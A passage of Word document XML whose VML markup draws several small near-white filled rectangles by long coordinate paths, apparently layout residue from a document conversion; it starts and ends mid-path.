7618,9519,7618,9518,7618,9516,7618,9515,7618,9514,7618,9512,7618,9511,7618,9509,7618,9508,7618,9506,7618,9504,7618,9503,7618,9501,7618,9499,7618,9497,7618,9495,7618,9493,7618,9491,7618,9489,7618,9487,7618,9485,7618,9482,7618,9480,7618,9477,7618,9475,7618,9472,7618,9470,7618,9467,7618,9464,7618,9461,7618,9458,7618,9455,7618,9452,7618,9449,7618,9446,7618,9443,7618,9439,7618,9436,7618,9432,7618,9428,7618,9425,7618,9421,7618,9417,7618,9413,7618,9409,7618,9405,7618,9401,7618,9396,7618,9392,7618,9387,7618,9383,7618,9378,7618,9373,7618,9369,7618,9364,7618,9358,7618,9353,7618,9348,7618,9343,7618,9337,7618,9332,7618,9326,7618,9320,7618,9315,7618,9309,7618,9302,7618,9296,7618,9290,7618,9284e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:397.500pt;margin-top:463.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7950,9270" coordsize="130,250">
        <v:shape style="position:absolute;left:7950;top:9270;width:130;height:250" coordorigin="7950,9270" coordsize="130,250" path="m7978,9284l7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7978,9284,7979,9284,7979,9284,7979,9284,7979,9284,7979,9284,7979,9284,7979,9284,7979,9284,7979,9284,7980,9284,7980,9284,7980,9284,7980,9284,7980,9284,7981,9284,7981,9284,7981,9284,7981,9284,7982,9284,7982,9284,7982,9284,7983,9284,7983,9284,7983,9284,7984,9284,7984,9284,7985,9284,7985,9284,7985,9284,7986,9284,7986,9284,7987,9284,7987,9284,7988,9284,7989,9284,7989,9284,7990,9284,7991,9284,7991,9284,7992,9284,7993,9284,7993,9284,7994,9284,7995,9284,7996,9284,7997,9284,7998,9284,7999,9284,7999,9284,8000,9284,8001,9284,8002,9284,8004,9284,8005,9284,8006,9284,8007,9284,8008,9284,8009,9284,8011,9284,8012,9284,8013,9284,8014,9284,8016,9284,8017,9284,8019,9284,8020,9284,8022,9284,8023,9284,8025,9284,8027,9284,8028,9284,8030,9284,8032,9284,8033,9284,8035,9284,8037,9284,8039,9284,8041,9284,8043,9284,8045,9284,8047,9284,8049,9284,8051,9284,8054,9284,8056,9284,8058,9284,8060,9284,8063,9284,8065,9284,8068,9284,8070,9284,8073,9284,8075,9284,8078,9284,8081,9284,8084,9284,8086,9284,8089,9284,8092,9284,8095,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9284,8098,9285,8098,9285,8098,9285,8098,9285,8098,9285,8098,9286,8098,9286,8098,9286,8098,9286,8098,9287,8098,9287,8098,9287,8098,9288,8098,9288,8098,9289,8098,9289,8098,9290,8098,9290,8098,9291,8098,9291,8098,9292,8098,9293,8098,9293,8098,9294,8098,9295,8098,9296,8098,9297,8098,9297,8098,9298,8098,9299,8098,9300,8098,9301,8098,9303,8098,9304,8098,9305,8098,9306,8098,9308,8098,9309,8098,9310,8098,9312,8098,9313,8098,9315,8098,9316,8098,9318,8098,9320,8098,9322,8098,9323,8098,9325,8098,9327,8098,9329,8098,9331,8098,9333,8098,9336,8098,9338,8098,9340,8098,9343,8098,9345,8098,9348,8098,9350,8098,9353,8098,9356,8098,9358,8098,9361,8098,9364,8098,9367,8098,9370,8098,9373,8098,9377,8098,9380,8098,9383,8098,9387,8098,9390,8098,9394,8098,9398,8098,9402,8098,9405,8098,9409,8098,9413,8098,9418,8098,9422,8098,9426,8098,9431,8098,9435,8098,9440,8098,9444,8098,9449,8098,9454,8098,9459,8098,9464,8098,9469,8098,9474,8098,9480,8098,9485,8098,9491,8098,9496,8098,9502,8098,9508,8098,9514,8098,9520,8098,9526,8098,9532,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8098,9539,8097,9539,8097,9539,8097,9539,8097,9539,8097,9539,8097,9539,8097,9539,8097,9539,8096,9539,8096,9539,8096,9539,8096,9539,8096,9539,8095,9539,8095,9539,8095,9539,8094,9539,8094,9539,8094,9539,8094,9539,8093,9539,8093,9539,8092,9539,8092,9539,8092,9539,8091,9539,8091,9539,8090,9539,8090,9539,8089,9539,8089,9539,8088,9539,8087,9539,8087,9539,8086,9539,8086,9539,8085,9539,8084,9539,8083,9539,8083,9539,8082,9539,8081,9539,8080,9539,8079,9539,8079,9539,8078,9539,8077,9539,8076,9539,8075,9539,8074,9539,8073,9539,8071,9539,8070,9539,8069,9539,8068,9539,8067,9539,8066,9539,8064,9539,8063,9539,8062,9539,8060,9539,8059,9539,8057,9539,8056,9539,8054,9539,8053,9539,8051,9539,8050,9539,8048,9539,8046,9539,8044,9539,8043,9539,8041,9539,8039,9539,8037,9539,8035,9539,8033,9539,8031,9539,8029,9539,8027,9539,8025,9539,8022,9539,8020,9539,8018,9539,8016,9539,8013,9539,8011,9539,8008,9539,8006,9539,8003,9539,8001,9539,7998,9539,7995,9539,7993,9539,7990,9539,7987,9539,7984,9539,7981,9539,7978,9539,7978,9539,7978,9539,7978,9539,7978,9539,7978,9539,7978,9539,7978,9539,7978,9539,7978,9539,7978,9539,7978,9539,7978,9539,7978,9539,7978,9538,7978,9538,7978,9538,7978,9538,7978,9538,7978,9538,7978,9538,7978,9538,7978,9537,7978,9537,7978,9537,7978,9537,7978,9536,7978,9536,7978,9536,7978,9535,7978,9535,7978,9535,7978,9534,7978,9534,7978,9533,7978,9533,7978,9532,7978,9532,7978,9531,7978,9530,7978,9530,7978,9529,7978,9528,7978,9528,7978,9527,7978,9526,7978,9525,7978,9524,7978,9523,7978,9522,7978,9521,7978,9520,7978,9519,7978,9518,7978,9516,7978,9515,7978,9514,7978,9512,7978,9511,7978,9509,7978,9508,7978,9506,7978,9504,7978,9503,7978,9501,7978,9499,7978,9497,7978,9495,7978,9493,7978,9491,7978,9489,7978,9487,7978,9485,7978,9482,7978,9480,7978,9477,7978,9475,7978,9472,7978,9470,7978,9467,7978,9464,7978,9461,7978,9458,7978,9455,7978,9452,7978,9449,7978,9446,7978,9443,7978,9439,7978,9436,7978,9432,7978,9428,7978,9425,7978,9421,7978,9417,7978,9413,7978,9409,7978,9405,7978,9401,7978,9396,7978,9392,7978,9387,7978,9383,7978,9378,7978,9373,7978,9369,7978,9364,7978,9358,7978,9353,7978,9348,7978,9343,7978,9337,7978,9332,7978,9326,7978,9320,7978,9315,7978,9309,7978,9302,7978,9296,7978,9290,7978,9284e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:127.500pt;margin-top:481.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2550,9630" coordsize="130,250">
        <v:shape style="position:absolute;left:2550;top:9630;width:130;height:250" coordorigin="2550,9630" coordsize="130,250" path="m2575,9644l2575,9644,2575,9644,2575,9644,2575,9644,2575,9644,2575,9644,2575,9644,2575,9644,2575,9644,2575,9644,2575,9644,2575,9644,2575,9644,2575,9644,2575,9644,2576,9644,2576,9644,2576,9644,2576,9644,2576,9644,2576,9644,2576,9644,2576,9644,2576,9644,2576,9644,2576,9644,2577,9644,2577,9644,2577,9644,2577,9644,2577,9644,2577,9644,2578,9644,2578,9644,2578,9644,2578,9644,2579,9644,2579,9644,2579,9644,2580,9644,2580,9644,2580,9644,2581,9644,2581,9644,2581,9644,2582,9644,2582,9644,2583,9644,2583,9644,2584,9644,2584,9644,2585,9644,2585,9644,2586,9644,2587,9644,2587,9644,2588,9644,2588,9644,2589,9644,2590,9644,2591,9644,2591,9644,2592,9644,2593,9644,2594,9644,2595,9644,2596,9644,2597,9644,2598,9644,2599,9644,2600,9644,2601,9644,2602,9644,2603,9644,2604,9644,2605,9644,2607,9644,2608,9644,2609,9644,2610,9644,2612,9644,2613,9644,2615,9644,2616,9644,2618,9644,2619,9644,2621,9644,2622,9644,2624,9644,2626,9644,2627,9644,2629,9644,2631,9644,2633,9644,2634,9644,2636,9644,2638,9644,2640,9644,2642,9644,2644,9644,2647,9644,2649,9644,2651,9644,2653,9644,2655,9644,2658,9644,2660,9644,2663,9644,2665,9644,2668,9644,2670,9644,2673,9644,2675,9644,2678,9644,2681,9644,2684,9644,2687,9644,2689,9644,2692,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9644,2695,9645,2695,9645,2695,9645,2695,9645,2695,9645,2695,9645,2695,9646,2695,9646,2695,9646,2695,9647,2695,9647,2695,9647,2695,9648,2695,9648,2695,9648,2695,9649,2695,9649,2695,9650,2695,9650,2695,9651,2695,9652,2695,9652,2695,9653,2695,9654,2695,9654,2695,9655,2695,9656,2695,9657,2695,9658,2695,9659,2695,9660,2695,9661,2695,9662,2695,9663,2695,9664,2695,9665,2695,9666,2695,9668,2695,9669,2695,9670,2695,9672,2695,9673,2695,9675,2695,9677,2695,9678,2695,9680,2695,9682,2695,9684,2695,9685,2695,9687,2695,9689,2695,9691,2695,9694,2695,9696,2695,9698,2695,9700,2695,9703,2695,9705,2695,9708,2695,9710,2695,9713,2695,9716,2695,9719,2695,9721,2695,9724,2695,9727,2695,9730,2695,9734,2695,9737,2695,9740,2695,9744,2695,9747,2695,9751,2695,9754,2695,9758,2695,9762,2695,9766,2695,9770,2695,9774,2695,9778,2695,9782,2695,9786,2695,9791,2695,9795,2695,9800,2695,9805,2695,9809,2695,9814,2695,9819,2695,9824,2695,9829,2695,9835,2695,9840,2695,9845,2695,9851,2695,9857,2695,9862,2695,9868,2695,9874,2695,9880,2695,9886,2695,9893,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2695,9899,2694,9899,2694,9899,2694,9899,2694,9899,2694,9899,2694,9899,2694,9899,2693,9899,2693,9899,2693,9899,2693,9899,2693,9899,2692,9899,2692,9899,2692,9899,2691,9899,2691,9899,2691,9899,2690,9899,2690,9899,2690,9899,2689,9899,2689,9899,2688,9899,2688,9899,2687,9899,2687,9899,2686,9899,2686,9899,2685,9899,2685,9899,2684,9899,2684,9899,2683,9899,2682,9899,2681,9899,2681,9899,2680,9899,2679,9899,2678,9899,2678,9899,2677,9899,2676,9899,2675,9899,2674,9899,2673,9899,2672,9899,2671,9899,2670,9899,2669,9899,2668,9899,2666,9899,2665,9899,2664,9899,2663,9899,2662,9899,2660,9899,2659,9899,2657,9899,2656,9899,2655,9899,2653,9899,2652,9899,2650,9899,2648,9899,2647,9899,2645,9899,2643,9899,2642,9899,2640,9899,2638,9899,2636,9899,2634,9899,2632,9899,2630,9899,2628,9899,2626,9899,2624,9899,2622,9899,2620,9899,2618,9899,2615,9899,2613,9899,2611,9899,2608,9899,2606,9899,2603,9899,2601,9899,2598,9899,2595,9899,2593,9899,2590,9899,2587,9899,2584,9899,2581,9899,2578,9899,2575,9899,2575,9899,2575,9899,2575,9899,2575,9899,2575,9899,2575,9899,2575,9899,2575,9899,2575,9899,2575,9899,2575,9899,2575,9899,2575,9899,2575,9899,2575,9899,2575,9898,2575,9898,2575,9898,2575,9898,2575,9898,2575,9898,2575,9898,2575,9897,2575,9897,2575,9897,2575,9897,2575,9896,2575,9896,2575,9896,2575,9895,2575,9895,2575,9894,2575,9894,2575,9894,2575,9893,2575,9892,2575,9892,2575,9891,2575,9891,2575,9890,2575,9889,2575,9889,2575,9888,2575,9887,2575,9886,2575,9885,2575,9884,2575,9883,2575,9882,2575,9881,2575,9880,2575,9879,2575,9878,2575,9876,2575,9875,2575,9874,2575,9872,2575,9871,2575,9869,2575,9868,2575,9866,2575,9865,2575,9863,2575,9861,2575,9859,2575,9857,2575,9855,2575,9853,2575,9851,2575,9849,2575,9847,2575,9845,2575,9842,2575,9840,2575,9838,2575,9835,2575,9833,2575,9830,2575,9827,2575,9824,2575,9821,2575,9819,2575,9816,2575,9812,2575,9809,2575,9806,2575,9803,2575,9799,2575,9796,2575,9792,2575,9789,2575,9785,2575,9781,2575,9777,2575,9773,2575,9769,2575,9765,2575,9761,2575,9756,2575,9752,2575,9748,2575,9743,2575,9738,2575,9734,2575,9729,2575,9724,2575,9719,2575,9714,2575,9708,2575,9703,2575,9697,2575,9692,2575,9686,2575,9681,2575,9675,2575,9669,2575,9663,2575,9657,2575,9650,2575,9644e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:145.500pt;margin-top:481.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2910,9630" coordsize="130,250">
        <v:shape style="position:absolute;left:2910;top:9630;width:130;height:250" coordorigin="2910,9630" coordsize="130,250" path="m2935,9644l2935,9644,2935,9644,2935,9644,2935,9644,2935,9644,2935,9644,2935,9644,2936,9644,2936,9644,2936,9644,2936,9644,2936,9644,2936,9644,2936,9644,2936,9644,2936,9644,2936,9644,2936,9644,2936,9644,2936,9644,2936,9644,2936,9644,2936,9644,2936,9644,2936,9644,2937,9644,2937,9644,2937,9644,2937,9644,2937,9644,2937,9644,2938,9644,2938,9644,2938,9644,2938,9644,2939,9644,2939,9644,2939,9644,2939,9644,2940,9644,2940,9644,2940,9644,2941,9644,2941,9644,2942,9644,2942,9644,2942,9644,2943,9644,2943,9644,2944,9644,2944,9644,2945,9644,2945,9644,2946,9644,2947,9644,2947,9644,2948,9644,2949,9644,2949,9644,2950,9644,2951,9644,2952,9644,2952,9644,2953,9644,2954,9644,2955,9644,2956,9644,2957,9644,2958,9644,2959,9644,2960,9644,2961,9644,2962,9644,2963,9644,2964,9644,2966,9644,2967,9644,2968,9644,2969,9644,2971,9644,2972,9644,2973,9644,2975,9644,2976,9644,2978,9644,2979,9644,2981,9644,2982,9644,2984,9644,2986,9644,2987,9644,2989,9644,2991,9644,2993,9644,2995,9644,2997,9644,2999,9644,3001,9644,3003,9644,3005,9644,3007,9644,3009,9644,3011,9644,3013,9644,3016,9644,3018,9644,3020,9644,3023,9644,3025,9644,3028,9644,3030,9644,3033,9644,3036,9644,3038,9644,3041,9644,3044,9644,3047,9644,3050,9644,3053,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9644,3056,9645,3056,9645,3056,9645,3056,9645,3056,9645,3056,9645,3056,9646,3056,9646,3056,9646,3056,9647,3056,9647,3056,9647,3056,9648,3056,9648,3056,9648,3056,9649,3056,9649,3056,9650,3056,9650,3056,9651,3056,9652,3056,9652,3056,9653,3056,9654,3056,9654,3056,9655,3056,9656,3056,9657,3056,9658,3056,9659,3056,9660,3056,9661,3056,9662,3056,9663,3056,9664,3056,9665,3056,9666,3056,9668,3056,9669,3056,9670,3056,9672,3056,9673,3056,9675,3056,9677,3056,9678,3056,9680,3056,9682,3056,9684,3056,9685,3056,9687,3056,9689,3056,9691,3056,9694,3056,9696,3056,9698,3056,9700,3056,9703,3056,9705,3056,9708,3056,9710,3056,9713,3056,9716,3056,9719,3056,9721,3056,9724,3056,9727,3056,9730,3056,9734,3056,9737,3056,9740,3056,9744,3056,9747,3056,9751,3056,9754,3056,9758,3056,9762,3056,9766,3056,9770,3056,9774,3056,9778,3056,9782,3056,9786,3056,9791,3056,9795,3056,9800,3056,9805,3056,9809,3056,9814,3056,9819,3056,9824,3056,9829,3056,9835,3056,9840,3056,9845,3056,9851,3056,9857,3056,9862,3056,9868,3056,9874,3056,9880,3056,9886,3056,9893,3056,9899,3056,9899,3056,9899,3056,9899,3056,9899,3056,9899,3056,9899,3056,9899,3056,9899,3056,9899,3055,9899,3055,9899,3055,9899,3055,9899,3055,9899,3055,9899,3055,9899,3055,9899,3055,9899,3055,9899,3055,9899,3055,9899,3055,9899,3055,9899,3055,9899,3055,9899,3054,9899,3054,9899,3054,9899,3054,9899,3054,9899,3054,9899,3053,9899,3053,9899,3053,9899,3053,9899,3052,9899,3052,9899,3052,9899,3052,9899,3051,9899,3051,9899,3051,9899,3050,9899,3050,9899,3049,9899,3049,9899,3049,9899,3048,9899,3048,9899,3047,9899,3047,9899,3046,9899,3046,9899,3045,9899,3044,9899,3044,9899,3043,9899,3042,9899,3042,9899,3041,9899,3040,9899,3039,9899,3039,9899,3038,9899,3037,9899,3036,9899,3035,9899,3034,9899,3033,9899,3032,9899,3031,9899,3030,9899,3029,9899,3028,9899,3027,9899,3025,9899,3024,9899,3023,9899,3022,9899,3020,9899,3019,9899,3018,9899,3016,9899,3015,9899,3013,9899,3012,9899,3010,9899,3009,9899,3007,9899,3005,9899,3004,9899,3002,9899,3000,9899,2998,9899,2996,9899,2994,9899,2993,9899,2991,9899,2988,9899,2986,9899,2984,9899,2982,9899,2980,9899,2978,9899,2975,9899,2973,9899,2971,9899,2968,9899,2966,9899,2963,9899,2961,9899,2958,9899,2955,9899,2953,9899,2950,9899,2947,9899,2944,9899,2941,9899,2938,9899,2935,9899,2935,9899,2935,9899,2935,9899,2935,9899,2935,9899,2935,9899,2935,9899,2935,9899,2935,9899,2935,9899,2935,9899,2935,9899,2935,9899,2935,9899,2935,9899,2935,9898,2935,9898,2935,9898,2935,9898,2935,9898,2935,9898,2935,9898,2935,9897,2935,9897,2935,9897,2935,9897,2935,9896,2935,9896,2935,9896,2935,9895,2935,9895,2935,9894,2935,9894,2935,9894,2935,9893,2935,9892,2935,9892,2935,9891,2935,9891,2935,9890,2935,9889,2935,9889,2935,9888,2935,9887,2935,9886,2935,9885,2935,9884,2935,9883,2935,9882,2935,9881,2935,9880,2935,9879,2935,9878,2935,9876,2935,9875,2935,9874,2935,9872,2935,9871,2935,9869,2935,9868,2935,9866,2935,9865,2935,9863,2935,9861,2935,9859,2935,9857,2935,9855,2935,9853,2935,9851,2935,9849,2935,9847,2935,9845,2935,9842,2935,9840,2935,9838,2935,9835,2935,9833,2935,9830,2935,9827,2935,9824,2935,9821,2935,9819,2935,9816,2935,9812,2935,9809,2935,9806,2935,9803,2935,9799,2935,9796,2935,9792,2935,9789,2935,9785,2935,9781,2935,9777,2935,9773,2935,9769,2935,9765,2935,9761,2935,9756,2935,9752,2935,9748,2935,9743,2935,9738,2935,9734,2935,9729,2935,9724,2935,9719,2935,9714,2935,9708,2935,9703,2935,9697,2935,9692,2935,9686,2935,9681,2935,9675,2935,9669,2935,9663,2935,9657,2935,9650,2935,9644e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:127.500pt;margin-top:526.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2550,10530" coordsize="130,270">
        <v:shape style="position:absolute;left:2550;top:10530;width:130;height:270" coordorigin="2550,10530" coordsize="130,270" path="m2575,10559l2575,10559,2575,10559,2575,10559,2575,10559,2575,10559,2575,10559,2575,10559,2575,10559,2575,10559,2575,10559,2575,10559,2575,10559,2575,10559,2575,10559,2575,10559,2576,10559,2576,10559,2576,10559,2576,10559,2576,10559,2576,10559,2576,10559,2576,10559,2576,10559,2576,10559,2576,10559,2577,10559,2577,10559,2577,10559,2577,10559,2577,10559,2577,10559,2578,10559,2578,10559,2578,10559,2578,10559,2579,10559,2579,10559,2579,10559,2580,10559,2580,10559,2580,10559,2581,10559,2581,10559,2581,10559,2582,10559,2582,10559,2583,10559,2583,10559,2584,10559,2584,10559,2585,10559,2585,10559,2586,10559,2587,10559,2587,10559,2588,10559,2588,10559,2589,10559,2590,10559,2591,10559,2591,10559,2592,10559,2593,10559,2594,10559,2595,10559,2596,10559,2597,10559,2598,10559,2599,10559,2600,10559,2601,10559,2602,10559,2603,10559,2604,10559,2605,10559,2607,10559,2608,10559,2609,10559,2610,10559,2612,10559,2613,10559,2615,10559,2616,10559,2618,10559,2619,10559,2621,10559,2622,10559,2624,10559,2626,10559,2627,10559,2629,10559,2631,10559,2633,10559,2634,10559,2636,10559,2638,10559,2640,10559,2642,10559,2644,10559,2647,10559,2649,10559,2651,10559,2653,10559,2655,10559,2658,10559,2660,10559,2663,10559,2665,10559,2668,10559,2670,10559,2673,10559,2675,10559,2678,10559,2681,10559,2684,10559,2687,10559,2689,10559,2692,10559,2695,10559,2695,10559,2695,10559,2695,10559,2695,10559,2695,10559,2695,10559,2695,10559,2695,10559,2695,10559,2695,10559,2695,10559,2695,10560,2695,10560,2695,10560,2695,10560,2695,10560,2695,10560,2695,10560,2695,10560,2695,10560,2695,10561,2695,10561,2695,10561,2695,10561,2695,10561,2695,10562,2695,10562,2695,10562,2695,10563,2695,10563,2695,10563,2695,10564,2695,10564,2695,10565,2695,10565,2695,10566,2695,10566,2695,10567,2695,10568,2695,10568,2695,10569,2695,10570,2695,10571,2695,10571,2695,10572,2695,10573,2695,10574,2695,10575,2695,10576,2695,10577,2695,10578,2695,10579,2695,10581,2695,10582,2695,10583,2695,10585,2695,10586,2695,10587,2695,10589,2695,10590,2695,10592,2695,10594,2695,10595,2695,10597,2695,10599,2695,10601,2695,10603,2695,10605,2695,10607,2695,10609,2695,10611,2695,10614,2695,10616,2695,10618,2695,10621,2695,10623,2695,10626,2695,10628,2695,10631,2695,10634,2695,10637,2695,10640,2695,10643,2695,10646,2695,10649,2695,10652,2695,10656,2695,10659,2695,10662,2695,10666,2695,10670,2695,10673,2695,10677,2695,10681,2695,10685,2695,10689,2695,10693,2695,10697,2695,10702,2695,10706,2695,10711,2695,10715,2695,10720,2695,10725,2695,10730,2695,10735,2695,10740,2695,10745,2695,10750,2695,10755,2695,10761,2695,10766,2695,10772,2695,10778,2695,10784,2695,10790,2695,10796,2695,10802,2695,10808,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2695,10814,2694,10814,2694,10814,2694,10814,2694,10814,2694,10814,2694,10814,2694,10814,2693,10814,2693,10814,2693,10814,2693,10814,2693,10814,2692,10814,2692,10814,2692,10814,2691,10814,2691,10814,2691,10814,2690,10814,2690,10814,2690,10814,2689,10814,2689,10814,2688,10814,2688,10814,2687,10814,2687,10814,2686,10814,2686,10814,2685,10814,2685,10814,2684,10814,2684,10814,2683,10814,2682,10814,2681,10814,2681,10814,2680,10814,2679,10814,2678,10814,2678,10814,2677,10814,2676,10814,2675,10814,2674,10814,2673,10814,2672,10814,2671,10814,2670,10814,2669,10814,2668,10814,2666,10814,2665,10814,2664,10814,2663,10814,2662,10814,2660,10814,2659,10814,2657,10814,2656,10814,2655,10814,2653,10814,2652,10814,2650,10814,2648,10814,2647,10814,2645,10814,2643,10814,2642,10814,2640,10814,2638,10814,2636,10814,2634,10814,2632,10814,2630,10814,2628,10814,2626,10814,2624,10814,2622,10814,2620,10814,2618,10814,2615,10814,2613,10814,2611,10814,2608,10814,2606,10814,2603,10814,2601,10814,2598,10814,2595,10814,2593,10814,2590,10814,2587,10814,2584,10814,2581,10814,2578,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10814,2575,10813,2575,10813,2575,10813,2575,10813,2575,10813,2575,10812,2575,10812,2575,10812,2575,10811,2575,10811,2575,10811,2575,10810,2575,10810,2575,10809,2575,10809,2575,10808,2575,10808,2575,10807,2575,10807,2575,10806,2575,10805,2575,10805,2575,10804,2575,10803,2575,10802,2575,10802,2575,10801,2575,10800,2575,10799,2575,10798,2575,10797,2575,10796,2575,10794,2575,10793,2575,10792,2575,10791,2575,10789,2575,10788,2575,10786,2575,10785,2575,10783,2575,10782,2575,10780,2575,10778,2575,10777,2575,10775,2575,10773,2575,10771,2575,10769,2575,10767,2575,10765,2575,10763,2575,10760,2575,10758,2575,10756,2575,10753,2575,10751,2575,10748,2575,10745,2575,10743,2575,10740,2575,10737,2575,10734,2575,10731,2575,10728,2575,10725,2575,10721,2575,10718,2575,10715,2575,10711,2575,10708,2575,10704,2575,10700,2575,10697,2575,10693,2575,10689,2575,10685,2575,10681,2575,10676,2575,10672,2575,10668,2575,10663,2575,10658,2575,10654,2575,10649,2575,10644,2575,10639,2575,10634,2575,10629,2575,10624,2575,10618,2575,10613,2575,10607,2575,10602,2575,10596,2575,10590,2575,10584,2575,10578,2575,10572,2575,10566,2575,10559e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:145.500pt;margin-top:526.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2910,10530" coordsize="130,270">
        <v:shape style="position:absolute;left:2910;top:10530;width:130;height:270" coordorigin="2910,10530" coordsize="130,270" path="m2935,10559l2935,10559,2935,10559,2935,10559,2935,10559,2935,10559,2935,10559,2935,10559,2936,10559,2936,10559,2936,10559,2936,10559,2936,10559,2936,10559,2936,10559,2936,10559,2936,10559,2936,10559,2936,10559,2936,10559,2936,10559,2936,10559,2936,10559,2936,10559,2936,10559,2936,10559,2937,10559,2937,10559,2937,10559,2937,10559,2937,10559,2937,10559,2938,10559,2938,10559,2938,10559,2938,10559,2939,10559,2939,10559,2939,10559,2939,10559,2940,10559,2940,10559,2940,10559,2941,10559,2941,10559,2942,10559,2942,10559,2942,10559,2943,10559,2943,10559,2944,10559,2944,10559,2945,10559,2945,10559,2946,10559,2947,10559,2947,10559,2948,10559,2949,10559,2949,10559,2950,10559,2951,10559,2952,10559,2952,10559,2953,10559,2954,10559,2955,10559,2956,10559,2957,10559,2958,10559,2959,10559,2960,10559,2961,10559,2962,10559,2963,10559,2964,10559,2966,10559,2967,10559,2968,10559,2969,10559,2971,10559,2972,10559,2973,10559,2975,10559,2976,10559,2978,10559,2979,10559,2981,10559,2982,10559,2984,10559,2986,10559,2987,10559,2989,10559,2991,10559,2993,10559,2995,10559,2997,10559,2999,10559,3001,10559,3003,10559,3005,10559,3007,10559,3009,10559,3011,10559,3013,10559,3016,10559,3018,10559,3020,10559,3023,10559,3025,10559,3028,10559,3030,10559,3033,10559,3036,10559,3038,10559,3041,10559,3044,10559,3047,10559,3050,10559,3053,10559,3056,10559,3056,10559,3056,10559,3056,10559,3056,10559,3056,10559,3056,10559,3056,10559,3056,10559,3056,10559,3056,10559,3056,10559,3056,10560,3056,10560,3056,10560,3056,10560,3056,10560,3056,10560,3056,10560,3056,10560,3056,10560,3056,10561,3056,10561,3056,10561,3056,10561,3056,10561,3056,10562,3056,10562,3056,10562,3056,10563,3056,10563,3056,10563,3056,10564,3056,10564,3056,10565,3056,10565,3056,10566,3056,10566,3056,10567,3056,10568,3056,10568,3056,10569,3056,10570,3056,10571,3056,10571,3056,10572,3056,10573,3056,10574,3056,10575,3056,10576,3056,10577,3056,10578,3056,10579,3056,10581,3056,10582,3056,10583,3056,10585,3056,10586,3056,10587,3056,10589,3056,10590,3056,10592,3056,10594,3056,10595,3056,10597,3056,10599,3056,10601,3056,10603,3056,10605,3056,10607,3056,10609,3056,10611,3056,10614,3056,10616,3056,10618,3056,10621,3056,10623,3056,10626,3056,10628,3056,10631,3056,10634,3056,10637,3056,10640,3056,10643,3056,10646,3056,10649,3056,10652,3056,10656,3056,10659,3056,10662,3056,10666,3056,10670,3056,10673,3056,10677,3056,10681,3056,10685,3056,10689,3056,10693,3056,10697,3056,10702,3056,10706,3056,10711,3056,10715,3056,10720,3056,10725,3056,10730,3056,10735,3056,10740,3056,10745,3056,10750,3056,10755,3056,10761,3056,10766,3056,10772,3056,10778,3056,10784,3056,10790,3056,10796,3056,10802,3056,10808,3056,10814,3056,10814,3056,10814,3056,10814,3056,10814,3056,10814,3056,10814,3056,10814,3056,10814,3056,10814,3055,10814,3055,10814,3055,10814,3055,10814,3055,10814,3055,10814,3055,10814,3055,10814,3055,10814,3055,10814,3055,10814,3055,10814,3055,10814,3055,10814,3055,10814,3055,10814,3054,10814,3054,10814,3054,10814,3054,10814,3054,10814,3054,10814,3053,10814,3053,10814,3053,10814,3053,10814,3052,10814,3052,10814,3052,10814,3052,10814,3051,10814,3051,10814,3051,10814,3050,10814,3050,10814,3049,10814,3049,10814,3049,10814,3048,10814,3048,10814,3047,10814,3047,10814,3046,10814,3046,10814,3045,10814,3044,10814,3044,10814,3043,10814,3042,10814,3042,10814,3041,10814,3040,10814,3039,10814,3039,10814,3038,10814,3037,10814,3036,10814,3035,10814,3034,10814,3033,10814,3032,10814,3031,10814,3030,10814,3029,108